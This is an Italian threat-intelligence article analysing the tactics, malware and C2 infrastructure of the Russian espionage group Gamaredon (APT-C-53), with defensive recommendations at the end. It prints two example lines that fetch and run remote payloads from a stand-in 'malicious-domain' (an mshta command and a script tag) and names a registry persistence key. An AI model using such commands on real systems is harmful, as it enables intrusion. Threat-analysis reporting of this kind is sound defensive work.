Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
Home
APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio

APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio

11 Dicembre 2024 07:10

Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.

Indice dei contenuti nascondi
1. Tecniche di Attacco e Vettori di Infezione
1.1. 1. File LNK Maligni
1.2. 2. File XHTML Malevoli
1.3. 3. Campagne di Spear-Phishing
2. Strumenti e Malware Impiegati
2.1. 1. Pteranodon
2.2. 2. LitterDrifter
2.3. 3. GammaLoad e GammaSteel
3. Tecniche di Persistenza e Obfuscation
4. Infrastruttura di Comando e Controllo (C2)
5. Settori Colpiti

Tecniche di Attacco e Vettori di Infezione

La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.

L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.

Advertising

1. File LNK Maligni

APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.

Esempio di Comando LNK:

mshta http://malicious-domain/payload.hta

2. File XHTML Malevoli

Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.

Tecnica di Download Dinamico:

<script src="http://malicious-domain/payload.js"></script>

3. Campagne di Spear-Phishing

APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.

Advertising

Strumenti e Malware Impiegati

1. Pteranodon

Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.

Funzionalità principali:

  • Esecuzione di comandi remoti
  • Esfiltrazione di file sensibili
  • Persistenza tramite chiavi di registro

2. LitterDrifter

Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.

Meccanismo di Diffusione:

  • Copia del file VBS nelle unità rimovibili
  • Creazione di file LNK dannosi nella root dell’unità USB
  • Esecuzione automatica tramite modifiche al file autorun.inf

3. GammaLoad e GammaSteel

Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.

Tecniche di Persistenza e Obfuscation

APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:

  1. Modifiche al Registro di Sistema:
    • Esecuzione automatica dei payload malevoli tramite chiavi di registro:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. Obfuscation degli Script:
    • Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.
  3. Infettare Dispositivi Rimovibili:
    • Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.

Infrastruttura di Comando e Controllo (C2)

L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:

  • Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
  • Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.

Esempio di IP associato: 5.181.189.32

Settori Colpiti

I settori principali presi di mira da APT-C-53 includono:

  • Governo
  • Difesa
  • Diplomazia
  • Media
  • Attivisti e ONG

APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:

  • Filtri avanzati per email e allegati
  • Monitoraggio delle modifiche al registro di sistema
  • Segmentazione della rete e restrizioni sui dispositivi USB
  • Aggiornamenti costanti dei sistemi di rilevamento delle minacce

Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.


📢 Resta aggiornatoTi è piaciuto questo articolo? Rimani sempre informato seguendoci su 🔔 Google News.
Ne stiamo anche discutendo sui nostri social: 💼 LinkedIn, 📘 Facebook e 📸 Instagram.
Hai una notizia o un approfondimento da segnalarci? ✉️ Scrivici


Sandro Sana 300x300
CISO, Head of Cybersecurity del gruppo Eurosystem SpA. Membro del gruppo di Red Hot Cyber Dark Lab e direttore del Red Hot Cyber PodCast. Si occupa d'Information Technology dal 1990 e di Cybersecurity dal 2014 (CEH - CIH - CISSP - CSIRT Manager - CTI Expert), relatore a SMAU 2017 e SMAU 2018, docente SMAU Academy & ITS, membro ISACA. Fa parte del Comitato Scientifico del Competence Center nazionale Cyber 4.0, dove contribuisce all’indirizzo strategico delle attività di ricerca, formazione e innovazione nella cybersecurity. Autore del libro "IL FUTURO PROSSIMO"
Aree di competenza: Cyber Threat Intelligence, NIS2, Governance & Compliance della Sicurezza, CSIRT & Crisis Management, Ricerca, Divulgazione e Cultura Cyber
Visita il sito web dell'autore